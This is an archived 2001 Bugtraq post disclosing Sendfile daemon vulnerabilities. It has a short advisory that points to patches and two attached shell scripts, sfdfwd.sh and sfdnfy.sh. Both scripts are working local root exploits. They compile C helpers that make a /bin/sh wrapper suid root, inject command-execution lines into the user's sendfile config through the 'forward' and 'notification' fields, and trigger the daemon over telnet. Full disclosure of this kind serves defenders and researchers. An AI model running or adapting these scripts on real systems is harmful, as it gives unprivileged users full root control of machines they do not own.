6501534 2001-05-15 09:10 -0700 /18 rader/ <psheep@hushmail.com>
Sänt av: joel@lysator.liu.se
Importerad: 2001-05-16 01:08 av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <17005>
Ärende: Sendfile daemon bugs
------------------------------------------------------------
I have attached two simple scripts which exploit vulnerabilities
which exist in the some versions of the Sendfile daemon, both allow
a local attacker to gain superuser privileges.
The bug exploited by sfdfwd.sh was supposed to have been fixed by the
patches provided in Debian Security Advisory DSA-050-1 and then
DSA-052-1 and was reported by Colin Phipps in November 2000, somehow
it has still not been fixed. The second bug has been reported
(without any success) to Debian,
it is the result of a serialization error combined with a lack of
error checking.
Anyone using this package should download the most recent copy of the
source code directly from the author's site and manually compile it,
or apply the patch used in Debian-unstable (sendfile_2.1-25).
Up-to-date copies of the source can be obtained from
ftp://ftp.belwue.de/pub/unix/sendfile/current
Free, encrypted, secure Web-based email at www.hushmail.com
(6501534) / <psheep@hushmail.com>/--------(Ombruten)
Bilaga (application/octet-stream) i text 6501535
Bilaga (application/octet-stream) i text 6501536
6501535 2001-05-15 09:10 -0700 /111 rader/ <psheep@hushmail.com>
Bilagans filnamn: "sfdfwd.sh"
Importerad: 2001-05-16 01:08 av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <17006>
Bilaga (text/plain) till text 6501534
Ärende: Bilaga (sfdfwd.sh) till: Sendfile daemon bugs
------------------------------------------------------------
#!/bin/sh
#
# sfdfwd - Sendfile daemon local arbitrary command execution vulnerability
#
# references:
# http://www.securityfocus.com/bid/2645
# http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=76048
#
# 04/24/01 psheep
SFUSER=$USER
SFHOST=localhost
SFPORT=saft
SFSPOOL=/var/spool/sendfile
SFUSERCFG="$SFSPOOL/$SFUSER/config/config"
echo "Sendfile daemon local arbitrary command execution exploit"
echo
echo " username = $SFUSER"
echo " spool directory = $SFSPOOL"
echo " config file = $SFUSERCFG"
echo " target hostname = $SFHOST"
echo " target port = $SFPORT"
echo
if ! test -d $SFSPOOL; then
echo "** unable to locate the sendfile spool directory, exiting"
exit 1
fi
sfsavedcfg="no"
if ! test -d $SFSPOOL/$SFUSER || ! test -d $SFSPOOL/$SFUSER/config; then
echo "** attempting to create sendfile spool directory for $SFUSER"
echo
(sleep 1;echo "TO $SFUSER";sleep 2) | telnet $SFHOST $SFPORT
echo
else
if test -f $SFUSERCFG; then
echo "** backing up your sendfile daemon configuration file"
mv $SFUSERCFG $SFSPOOL/$SFUSER/config/config.tmp
sfsavedcfg="yes"
fi
fi
cat > sfdfwd.c << EOF
#include <unistd.h>
#include <stdlib.h>
int main() {
setreuid(0,0);
setgid(0);
system("chown root.root $PWD/sfdsh;chmod 4755 $PWD/sfdsh");
}
EOF
cat > sfdsh.c << EOF
#include <unistd.h>
int main() {
setreuid(0,0);
setgid(0);
execl("/bin/sh", "sh", NULL);
}
EOF
echo "** compiling helper application as $PWD/sfdfwd"
cc -o $PWD/sfdfwd $PWD/sfdfwd.c
if ! test -x $PWD/sfdfwd; then
echo "** compilation failed, exiting"
exit 1
fi
echo "** compiling shell wrapper as $PWD/sfdsh"
cc -o $PWD/sfdsh $PWD/sfdsh.c
if ! test -x $PWD/sfdsh; then
echo "** compilation failed, exiting"
exit 1
fi
echo "** inserting commands into temporary configuration file"
echo "forward = |$PWD/sfdfwd" >$SFUSERCFG
echo "** attempting attack against sendfile daemon..."
echo
(sleep 1;cat << EOF
FROM $USER
TO $USER
FILE boom$RANDOM
SIZE 0 0
DATA
QUIT
EOF
sleep 2) | telnet $SFHOST $SFPORT
echo
if test "x$sfsavedcfg" = xyes; then
echo "** restoring backed up configuration file"
mv $SFSPOOL/$SFUSER/config/config.tmp $SFUSERCFG
else
echo "** removing temporary configuration file"
rm $SFUSERCFG
fi
echo "** done, the shell wrapper should be suid root"
echo
exit 1
(6501535) / <psheep@hushmail.com>/------------------
6501536 2001-05-15 09:10 -0700 /113 rader/ <psheep@hushmail.com>
Bilagans filnamn: "sfdnfy.sh"
Importerad: 2001-05-16 01:08 av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <17007>
Bilaga (text/plain) till text 6501534
Ärende: Bilaga (sfdnfy.sh) till: Sendfile daemon bugs
------------------------------------------------------------
#!/bin/sh
#
# sfdnfy - Sendfile daemon local arbitrary command execution vulnerability
#
# references:
# http://www.securityfocus.com/bid/2652
# http://www.securityfocus.com/bid/2631
#
# 04/24/01 psheep
SFUSER=$USER
SFHOST=localhost
SFPORT=saft
SFSPOOL=/var/spool/sendfile
SFUSERCFG="$SFSPOOL/$SFUSER/config/config"
echo "Sendfile daemon local arbitrary command execution vulnerability"
echo
echo " username = $SFUSER"
echo " spool directory = $SFSPOOL"
echo " config file = $SFUSERCFG"
echo " target hostname = $SFHOST"
echo " target port = $SFPORT"
echo
if ! test -d $SFSPOOL; then
echo "** unable to locate the sendfile spool directory, exiting"
exit 1
fi
sfsavedcfg="no"
if ! test -d $SFSPOOL/$SFUSER || ! test -d $SFSPOOL/$SFUSER/config; then
echo "** attempting to create sendfile spool directory for $SFUSER"
echo
(sleep 1;echo "TO $SFUSER";sleep 2) | telnet $SFHOST $SFPORT
echo
else
if test -f $SFUSERCFG; then
echo "** backing up your sendfile daemon configuration file"
mv $SFUSERCFG $SFSPOOL/$SFUSER/config/config.tmp
sfsavedcfg="yes"
fi
fi
cat > sfdnfy.c << EOF
#include <unistd.h>
#include <stdlib.h>
int main() {
setreuid(0,0);
setgid(0);
system("chown root.root $PWD/sfdsh;chmod 4755 $PWD/sfdsh");
}
EOF
cat > sfdsh.c << EOF
#include <unistd.h>
int main() {
setreuid(0,0);
setgid(0);
execl("/bin/sh", "sh", NULL);
}
EOF
echo "** compiling helper application as $PWD/sfdnfy"
cc -o $PWD/sfdnfy $PWD/sfdnfy.c
if ! test -x $PWD/sfdnfy; then
echo "** compilation failed, exiting"
exit 1
fi
echo "** compiling shell wrapper as $PWD/sfdsh"
cc -o $PWD/sfdsh $PWD/sfdsh.c
if ! test -x $PWD/sfdsh; then
echo "** compilation failed, exiting"
exit 1
fi
echo "** inserting commands into temporary configuration file"
echo "notification = mail $USER;$PWD/sfdnfy" >$SFUSERCFG
echo "** attempting attack against sendfile daemon..."
echo
(sleep 1;cat << EOF
FROM $USER
TO $USER
FILE boom$RANDOM
SIZE 0 0
DATA
FILE boom$RANDOM
SIZE 1 0
DATA
EOF
sleep 2) | telnet $SFHOST $SFPORT
echo
if test "x$sfsavedcfg" = xyes; then
echo "** restoring backed up configuration file"
mv $SFSPOOL/$SFUSER/config/config.tmp $SFUSERCFG
else
echo "** removing temporary configuration file"
rm $SFUSERCFG
fi
echo "** done, the shell wrapper should be suid root after the mailer
is done" echo exit 1
(6501536) / <psheep@hushmail.com>/--------(Ombruten)